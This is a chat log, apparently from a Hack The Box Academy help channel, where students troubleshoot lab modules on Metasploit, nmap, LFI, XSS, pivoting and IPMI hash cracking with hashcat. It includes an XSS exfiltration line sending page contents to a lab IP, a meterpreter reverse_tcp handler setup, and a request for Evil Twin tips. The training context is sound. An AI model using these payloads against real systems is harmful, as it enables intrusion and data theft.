not visiting a page to google/msf the version of some plugin

even if that's an obvious thing to try to see if it progresses, it's not "look at services"

it's "exploit this low hanging fruit"

grumble and now host resolution fails

reset it and try again

whenever you're given an IP:PORT your only scope is the PORT on that IP

That's what we've been telling him

also you're doing an easy/basic module that's just got a bit of most things to get you into understanding what you'll run across

it's not expecting you to do something insanely crazy

the examples are there to show you the flow of figuring it out

discover X
search X
try Y Exploit

I wasn't expecting crazy..just the ability to actually see ftp, ssh, smb, and so on... if I'm expected to consider them...and if not, then why bring them up?

as for resolution... noted..I forgot RPORT

They weren't brought up

actually SMB is brought up as the example

but that's mostly because it has one of the most well known exploits out there; EternalBlue

Yes in the example

aside from that though you can't expect the examples to always be 1::1 to what to expect in the lab, the section is about finding public exploits to something -- so you first figure out what it is that something is
the public IP they give you is a docker container (luckily) so all the other ports are likely hosting labs for other people

Hello! I have some problem with JavaScript Deobfuscation, module 41 section 519 skills assessment the last 2 questions

Am I going crazy? Trying to move a file from SSH from a HTB module to my own to unzip -- tried scp "path_to_file" "output_destination" doesn't seem to work though

can you provide the command you used?

scp /home/kira/Documents/Notes.zip /home/me/Desktop

you have to specify ip/hostname etc.

scp remoteuser@host:/filepath ~/Desktop/

no such file directory lol

Can you link to the module and what section ?

Password Attacks | Default Passwords / Password Reuse

Are you running the command locally?

link the module here so I can easily click it

https://academy.hackthebox.com/module/147/section/1328

Connected to a user through SSH if that helps? Not sure what you mean by locally to be honest

The format is
scp user@remote.server:/path/to/file /path/to/local/

yeah I tried that

You run this on your machine, not on the target

that worked ^

Thanks - guess it's gonna be one of those days

This was covered at length in the file transfers module - did you skip it?

No, just starting to slowly get back in to this after quite a bit of time away from it

Hello everyone please help me with the module LOGIN BRUTE FORCING Skills Assessment Part2

the info you need is given in assessment one

I found the name Thomas

How are the HTB academy path estimated time calculated - I think CPTS said it was in the 40 days. Is that based on the combined hours?

as in 960 hours?

It's based on 8 hour days of complete work

Thanks mate

Hey guys, I am facing a problem with the Shells and payloads module >> Automating Payloads with Metasploit q2 everytime I use psexec smb exploit

it returns a exploit was created but nothing really happens

https://academy.hackthebox.com/module/110/section/1053
how to do it ? question : try running 'auxiliary/scanner/http/http_put' in Metasploit on any website,

on any website ?

I think you need to put the given task IP Address as RHOSTS using:
set RHOSTS <ip>

yesh they don't give ip

is there any url given to you

then you can do nslookup to it you will get the IP

any website is fine

Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?

https://academy.hackthebox.com/module/41/section/519
I have a problem with last 2 questions

Which it's the secret key??

wow i open python -m http.server and use proxychains msfconsole and capture in burp . nice 👍

Hej guys 🙂 I am bit stuck at the moment. I am on the nmap module https://academy.hackthebox.com/module/19/section/108 and my current challenge is: 'Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. '

So I thought, sounds easy, so i tried several scripts on the target. Beside that i tried different scan parameters and i always see the same possible flag in my scan results. When i try to add the flag value as answer it always says that my answer is incorrect. I interpret the challenge description that via nmap the flag can be captured, but at the moment i question myself I i understand the description correctly. I also captured the traffic and looked through the dump, but i only see the same HTB flag again and again, which seems not be the right answer.

Any tip would be appreciated 🙂

check for leading & trailing spaces, and try reseting the target

key is not in the javascript. You have to understand what the javascript it doing. What do you think it's doing?

Hello, has anybody here have done the module 'Introduction to Windows Evasion Techniques' section 'Process Injection' for some assistance please?

I retried my scans on a newly created target and still nothing else beside the other flag. I skipped some NSE modules like dos, exploit or vuln. But maybe the token is hidden behind a service and nmap itself is not meant to discover that flag, but thats not how I interpret that challegen tbh :/ Also tried to verify the string I copy / paste into the answer field. Tried trimming, different combinations with the only flag i found, but its not accepted as an answer.

robots can be tricky

[yes that's a hint]

Indeed! Guess I need to figure out what scripts are invoked by which script module

i'm more meaning some that may exist on webservers 😉

hehe, i just tried to say that your hint works, but i wonder if the hint should have been part of any NSE module I already tried 🙂 I just extracted that one manually now.

https://academy.hackthebox.com/achievement/1014841/41

Did you figure out the code yet? If you follow previous sections, it tells you also how to get secret key.

I justed checked the man page of nmap and normally robots scan should have been part of default, discovery and safe. I retried the module and nmap is not spilling out the flag. The docs mention that it only lists disallowed entries. Guess from the content of the file its not disallowed. I tried to execute the specific nse scripts for robots and it doesnt reveal anything via nmap to the console.

http-enum script says it discovered the file, but doesn't output anything. The specific script for robots has no output, except that the http service is open on port 80. What I am trying to say is, that from the challenge description I would have expected to find the flag directly via nmap output. Maybe i shouldnt care to much about the wording ^^ Thank you very much 🙂

edit: just checked the solution for that module and the answer is not what I thought the challenge description implies. So yeah, i took the words too literally.

Hi there,
Currently stuck on skills assessment for module Local File Inclusion...
I managed to do source code disclosure to identify an FI vulnerability. I have identified two security mechanisms to bypass (trying not to spoil here...) but i am not able to bypass them... even tried RFI... but stuck at this point... Any hint appreciated

Doesn't the injection occur once the calculator is spawned by a user? It's been a while since I did that module.

Have managed to view the page source of index? This can be done using base64-encode filter from the course?

yes exactly

I DMed you

Have you managed to view the page source then?

yes I did, so i saw how the app prevents path traversal, and saw also file extension appended

Can you DM me?

i have joined a team but it still says to join a team

how to play this ctf

wrong channel

🔴 Need help with a Wi-Fi Evil Twin attack! 🔴
I'm working on an Evil Twin Attack against the PulseGrid Wi-Fi network and need some guidance.
The goal is to compromise a client device and retrieve flag.txt.
I've set up the basics, but I'm struggling to get clients to connect reliably.
Does anyone have tips on improving the attack or making the fake AP more convincing?
Any advice would be greatly appreciated!

Hi, could someone clarify whether a Stage0 payload is the same as a stager payload?

If they are the same, are there scenarios where Stage0 is handled by a stage payload?

I’m a bit confused about the distinction between stages and the different types of payloads. Could someone explain the reason for differentiating them?

This is for the ‘Using the metasploit framework’ module

stage0 is also called stager, yes. It is a very small payload that is hopefully good at being undetected that once executed is able to retrieve the real payload (which is much bigger and more likely to trigger antivirus when dropped on the harddrive) from a server into memory to then execute from there

Hi, in the "Web Attacks" Module, in IDOR section -> "Bypassing Encoded References", I can´t download any contract, I am getting a 403. I found how the server is encoding but I am not able even download my own contract, so the one with uid=1, should be like that o something is wrong?

Hi everyone! Pivoting, Tunneling, and Port Forwarding -> RDP and SOCKS Tunneling with SocksOverRDP -> the internal windows machine is not loading properly. I can't even ping it. Been trying for couple of hours now. Super simple assessment, but I cant get it completed. Any advice?

If it's truly not loading and not user error, change servers or regions

Some devices block pings.

I know, tried RDP first (this is part of the assessment).

Let me try this real quick! Can't believe didn't think of this lol

Are you connecting as soon as it spawns? Most windows machines take a while to warm up.

If you try to connect before they're ready, they can give you issues.

No, I've been waiting for quite a while. Nearly halfway through the path already, have encountered these types of assessments before, but maybe by sheer luck never experienced any machines not loading.

Pings aside, did you nmap?

Just changed the server. Let me see if it loads in a couple of minutes or not. If not, I'll proxychains nmap the internal network. It's a double pivot assessment with RDP.

Oh, I thought this was the socksoverrdp part - that was a double pivot?

Uhh, pretty sure this isn't double

Changing regions did it!!

No it is! Foothold, then 172.16.5.19, then 172.16.6.155

that's a single pivot lol

Foothold is that first box, isn't it?

It's been a while since I did the module, but I think this was still single. Though, I would semi-recommend ignoring using socksoverRDP for this lol

Foothold is the one box. Then you SocksRDP into another, then into another. It's literally categorized as Double Pivot in the module lmao

RDP is painful sometimes in Pwnbox.

But hey, thanks for your help, both of you!!!

Personal record -- being nearly halfway done with a certificate study before crying on the relevant Discord channel!

This isn't module specific per say, but I'm trying to diagnose this issue to complete a module, so I hope it's alright:

I'm needing to use SecLists to brute force a subdomain. I often times use locate seclists | grep "something" |xclip -selection clipboard

Suddenly, even just using the "locate seclists" alone keeps givng me only the following result: /usr/share/parrot-menu/applications/parrot-seclists.desktop

I usually get a list of all the folders and wordlists and such, but now I'm getting that as the only result popping up. I've tried using git and apt to reinstall and I'm up to date. Ideas?

Run sudo updatedb

running it as sudo I'm getting permission denied

you shouldn't have permission denied on your own system

if you are; you did something very wrong

sudo updatedb
/usr/bin/find: '/run/user/1000/doc': Permission denied
/usr/bin/find: '/run/user/1000/gvfs': Permission denied

That was the command and output of what @oblique tiger suggested

Someone can help me with this?

What manages multiple cell towers in cellular networks?

R: mobile switching center

I get an error when entering the answer

Hello i am on the web proxy i am on the step of where u add your CA certificate for zap in firefox first i am unable to find any option name dynamic SSL certificate in my tools options in ZAP and any further options to do so and unable to find about:preferences#privacy and at last is the CA certificates are preconfigured in my HTB academy vm??

Doing cbbh module 3

read the section and it'll give you the answer

the option has since moved from when the module was created

Where is it now

How do i access it

you can search the add-ons/plugins for cert and you should find it

it's been a minute since i set it up

I got the reverse shell, but something is wrong i havent found julio directory, am i doing something wrong?

Hello. I do not find the button to write to the support in the Academy anymore.
Here is the issue. In the module "Active Directory Enumeration & Attacks", section "DCSync", the given password does not work for the ACADEMY-EA-ATTACK01 machine. You should use the other one given in the section "LLMNR/NBT-NS Poisoning - from Linux".

bottom right of the screen, if you don't see it disable adblock/extensions

is there anyone i can talk to so i show them what i have done?

I disabled ublock and I still cannot see the button. I tried with Chromium, free of all extensions, and I do not have the button either.

You don't see a chat bubble at the bottom right?

No.

try pressing CTRL+SHIFT+R

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

It changes nothing.

Also i believe one of the sections tells you the creds for the attack machine, this doesn't change

Go ahead and try the link MarcieLee provided

As it's part of the total setup

I agree but I think it is confusing.

With this link, I correctly have the button. I'll try. Thanks.

Hello please help me find the path to htb-students home directory

Hi, in the "Web Attacks" Module, in IDOR section -> "Bypassing Encoded References", I can´t download any contract, I am getting a 403. I found how the server is encoding but I am not able even download my own contract, so the one with uid=1, should be like that o something is wrong?

Thank for confirming it ollizOr!

Hello guys. in the information gathering, web addition, for the "Creepy Crawlies" section, I'm having a hard time getting ReconSpider and scrapy to work. for a variety of different reasons. I've done both: sudo apt-get install python3-scrapy -y
(which installed properly except for Missing executable file kcmshell5 at launcher /usr/share/applications/kcm_trash.desktop)

And did the wget as instructed by the module for ReconSpider.py (I just copied an pasted it for convenience, though I can type out the commands here).

When I go to execute "python3 ReconSpider.py http://inlanefreight.com", I get an error saying "Traceback (most recent call last):
File "/home/nick/ReconSpider.py", line 6, in <module>
from scrapy.downloadermiddlewares.offsite import OffsiteMiddleware
ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite' " (I just copied and pasted.

Did I mess something up on the install?

hi

On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts? , can anyone give me a hint on this ? I readed the text 10 times and did not find the answear , Broken Authentication
Brute-Forcing Password Reset Tokens

solved

Stuck on Advanced XSS and CSRF Exploitation XSS Filter Bypasses for the past day or so. Anyone free to give me a pointer?

Are you stuck trying to find a filter bypass that works or something else

Got the xss bypass and can get an alert showing from the exploit server but when I try to do a xhr.open on '/home.php' and access the guestbook myself, I keep getting "Uncaught DOMException: XMLHttpRequest.open: '/home.php' is not a valid URL." When I put in the full URL I get CORS errors.

Maybe there's another endpoint you can reach instead of home.php 😉

I know about admin but I can't even get the script to run under my own context.

don't include the port if you're including that on the exil page

exfil.open("GET", "https://10.10.x.x/exfil?r=" + btoa(xhr.responseText), false); - But not getting this far in my script. Can't call the /home.php to get the source.

you can DM me your whole code

Okay yeah the module changed since I did it and I don't have time to go re-do it right now sorry maybe someone else can assist

If you're still stuck on this I don't mind checking what you've got going on.

👍

Hello Guys can anyone explain me why when i give command in msfconsole set payload windows/meterpreter/x64/reverse_tcp it throws me an error

something like wrong payload given for msf

its windows/x64

meterpreter/windows/x64??

Question: https://academy.hackthebox.com/module/24/section/514
-- Web Upload part

• Why do we even need that self-signed certificate for this scenario?
  Or is this just for the pwnbox specifically?

Check dm

So you can use https and send the data encrypted instead of plaintext.

windows/x64/meterpreter

Aren't you supposed to be in a handler first?
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp

It's just odd, why would we need to do that ?
Cheers for the reply

I literally said why in the message you replied to

I mean yeah we encrypt the data, I'm trying to understand "why?" - considering we are just uploading files why would that matter compared to plaintext.

because someone else can see it?

so no one can snoop on the data and see it in plaintext

Got it cheers, just was curious 😄

This tells me that payload is wrong

i just told you it

Hello guys... I'm having an issue getting ReconSpider and Scrapy to work together... It's from the module "Information Gathering-Web Edition". Since it has to do with troubleshooting why those tools aren't working properly on my machine and not the module per say (Though I need them for the module), can I still ask here? If not, can I DM someone that is willing to help?

if anyones done process injection, detecting dll injection lmk

Hey guys, I'm having trouble with the linux fundamentals module. In the system information portion it is having me ssh into a target and pull information, but when I ssh into it, it doesn't give me the expected user/password prompts, just a password prompt for root@(Target) and the provided password does not work so I can't complete the module. I'm using my own VM and yes I have openvpn runing with the provided config file. Screen shot of issue

SSH does not prompt for user. It is passed in the command by doing ssh user@host

hey guys um for some reason haschat isnt working for some stupid reason

If you do not pass a user, it uses the current user that you are.

this is my current file and ill drop the command error in a sec

ahhhhh ok thank you

i have 0 clue why it isnt working and if your wondering this is footprinting ipmi

someone pleaseeee help

look at your error Token length exception

Token length exception meaning you're either using a wrong token type -m or the file contains an error

it's because your hash is not what hashcat is expecting

i showed yall my file

You need to correctly identify your hash

yes

remove the admin: part

what type of has is idk man

that admin: part is the username

ok ill be back please wait for me

the : separates the username from the hash

do i remove everytging up to the second admin?

you need only the hash, not the username

?

actually i did not see the whole hash

give me a sec

┌─[us-academy-2]─[10.10.14.179]─[htb-ac-1794577@htb-hhgg3i1yqu]─[~]
└──╼ [★]$ hashcat -m 7300 file.txt -a 3 ?a?a?a?a?a?a?a?a --force
hashcat (v6.2.6) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

• Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]

• Device #2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile 'file.txt' on line 1 (a8d32d4ab85dc7e35b71a04f7355fc3d6ebb38c0): Separator unmatched
No hashes loaded.

Started: Fri Mar 21 17:47:02 2025
Stopped: Fri Mar 21 17:47:02 2025
┌─[us-academy-2]─[10.10.14.179]─[htb-ac-1794577@htb-hhgg3i1yqu]─[~]
└──╼ [★]$

new error 🔥

Hello guys, I'm still having problems getting ReconSpider and Scrapy to work... I think the issue is Scrapy because when I run ReconSpider, it keeps saying it cant find a python script from Scrapy. I've tried what feels like everything under the sun, and even running updatedb or sudo updatedb keeps giving me permission denied.... (which I dont get how I'm getting permission denied as a super user). This is all needed for the information gathering-web addition.

i believe you're using the wrong hashcat mode

what mode i use

i pulled this straight from the module

https://www.tunnelsup.com/hash-analyzer/

Try this

do not post module content above tier 0

sorry

try just using metasploit

i used metasploit alr

then it should have outputted the password

Try to identify the hash type first, then lookup the mode in hashcat documentation, to my understanding.

bro im trying to write the fricking has out or copy paste my code hold on

https://hashcat.net/wiki/doku.php?id=example_hashes

Looks like it's SHA1

I copy pasted your hash into hash analyzer and got SHA1

it is not SHA1

i believe it is a supermicro IPMI hash

it is an IPMI hash

oh wait i'm dumb

it's just SHA1 nvm

🙂

hash-identifier

use -m 100

i've used hashid in the past and it spat out 15 million different hash types before so i have been skeptical of its analysis

but i'm just wrong this time so L

https://www.tunnelsup.com/hash-analyzer/ I used this

I recommend this. it's pretty accurate most of the time

oh my god you fucking goat

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
what do i click?

nothing you can just let it run

thank your my goats

Baaaaaa

ok i was right

it is technically not SHA1

im waiting nothing has happened

how long does it typically take

reading the section actually helps, who knew

bro the section says -7300

@unique spruce press q

change the hash mode to 7300

that gave me an error bro

remove the admin: part

theres no admin part anymore

and 7300 just gave me an error

that is not the hash

you removed 2/3s of the hash

this was your hash, yes

remove the admin: part

only remove the admin:

you used the command straight from the section, yes?

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

that is for HP iLO

thank you goats!! now i just wait

IPMI2 RAKP HMAC-SHA1

BTW, what module/section is this?

it's Footprinting - IPMI

Footprinting - IPMI

yo what doi click this thing isnt doing shit

if you identified the IPMI service as HP iLO then you'd probably run this command

otherwise the hashcat mode should be set to 0 and you'd run it against some password list like rockyou.txt

i'll give you a hint, the IPMI service is not HP iLO

bro i dont want hints anymore im just mad

also for some reason my rockyou.txt is fricking rockyou.txt.gz

just use gunzip

how do i fix that??

oh ok hold on

7300 is correct for any ipmi hash btw

yes but the hashcat mode is wrong for cracking non-HP iLOs

Hey everyone so im new to Cybersecurity any tips on how to learn Linux from basics im currently trying to log into SSH and having issues . Sorry for such a basic question

The mask is what makes the iLo one unique

Google is your friend

How to do X in Linux is in a fair bit of my search history

if it's a default password****

i need my CPTS revoked i'm washed

There is also a linux fundamentals module IIRC

I hope its ok to bump this again: I'm still having problems getting ReconSpider and Scrapy to work... I think the issue is Scrapy because when I run ReconSpider, it keeps saying it cant find a python script from Scrapy. I've tried what feels like everything under the sun, and even running updatedb or sudo updatedb keeps giving me permission denied.... (which I dont get how I'm getting permission denied as a super user). This is all needed for the information gathering-web addition.

https://academy.hackthebox.com/module/details/18

Are you downloading ReconSpider from the link? Also sudo pip3 install scrapy --break-system-packages

The ReconSpider on github is a completely different one than the module one

I typed the exact commands in the module. Let me try what you just suggested to see if it works.

you can always try:
pipx install scrapy
so that you don't risk breaking your sys packages 🙂

When I tried using pipx or pip3, I keep getting a "This is externally managed" type of error

isn't scrapy a python library too

i also tried sudo apt-get install python3-scrapy (I think was it off the top of my head)

From what I've gathered, yes

then pipx won't work

@fathom pendant sudo pip3 install scrapy --break-system-packages
Requirement already satisfied: scrapy in /usr/lib/python3/dist-packages (2.8.0)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv

just install it in a python venv. python3 -m venv venv, then activate the venv

Thats a warning

Doesn't mean it didn't work

I'm getting the same error running recon spider atm

What is the exact error

why cant i echo a file within /usr/share/wordlists

you can cat a file

Traceback (most recent call last):
File "/home/nick/ReconSpider.py", line 6, in <module>
from scrapy.downloadermiddlewares.offsite import OffsiteMiddleware
ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'

like i only have a read only permissions on this file even tho im on the pwnbox vm??

like im trying to add the hash to this empty file i just made

I forget the fix to this as I didn't run into this

echo just echos out what you type in the terminal. To display a file you can use cat (short for concatenate) or less

But you can probably search the channel

you can just put the hash in a file in your home dir

all you have to do is crack the hash with hashcat

Thanks! I've attempted this not sure what im missing but can't correctly login via SSH

kk. If I'm unable to find a fix, is there an alternate spidering tool I can try to use that you are aware of so I can complete the question in this section?